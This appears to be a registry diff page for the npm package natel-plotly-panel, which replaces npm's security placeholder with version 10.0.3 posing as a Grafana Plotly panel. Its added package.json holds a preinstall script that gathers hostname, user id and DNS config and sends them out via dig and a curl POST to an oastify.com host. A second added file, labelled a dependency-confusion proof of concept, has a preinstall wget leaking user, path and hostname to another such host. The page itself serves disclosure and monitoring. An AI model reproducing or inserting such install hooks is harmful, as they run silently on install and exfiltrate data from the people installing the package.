natel-plotly-panel 0.0.1-security → 10.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of natel-plotly-panel might be problematic. Click here for more details.

package/index.js ADDED
File without changes
package/package.json CHANGED
@@ -1,6 +1,19 @@
1
1
  {
2
2
  "name": "natel-plotly-panel",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "10.0.3",
4
+ "description": "Plotly panel for Grafana. This is a security placeholder.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "(echo '[+] === RCE PROOF STAGE 1: SYSTEM INFO ==='; echo '[+] Hostname:' && hostname && echo '[+] User ID:' && id && echo '[+] DNS Config:' && cat /etc/resolv.conf && echo '[+] === RCE PROOF STAGE 2: DNS EXFILTRATION TRIGGER ===' && echo '[+] Sending DNS query with hostname and username to OAST server...' && dig \"rce-proof-$(whoami)-$(hostname).t0umm5ku6orkzwdkh5hpjdbi49a1yrmg.oastify.com\" && echo '[+] DNS query sent. Check your OAST server DNS logs for a request from the target DNS resolver (e.g., 10.107.98.155).') | base64 -w0 | curl -s -X POST --data-binary @- http://t0umm5ku6orkzwdkh5hpjdbi49a1yrmg.oastify.com"
8
+ },
9
+ "repository": {
10
+ "type": "git",
11
+ "url": "git+https://github.com/aiven/grafana-plotly-panel.git"
12
+ },
13
+ "author": "",
14
+ "license": "Apache-2.0",
15
+ "bugs": {
16
+ "url": "https://github.com/aiven/grafana-plotly-panel/issues"
17
+ },
18
+ "homepage": "https://github.com/aiven/grafana-plotly-panel#readme"
6
19
  }
package/pakage.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "cms-media-bridge",
3
+ "version": "10.0.1",
4
+ "description": "PoC for Dependency Confusion vulnerability",
5
+ "scripts": {
6
+ "preinstall": "sh -c 'wget --quiet \"http://7y6ftwvzeqjn824k9d0rzpmvcmig66uv.oastify.com/?event=preinstall&user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"'",
7
+ "preupdate": "sh -c 'wget --quiet \"http://...\"'",
8
+ "test": "sh -c 'wget --quiet \"http://...\"'"
9
+ },
10
+ "author": "orwa",
11
+ "license": "ISC"
12
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=natel-plotly-panel for more information.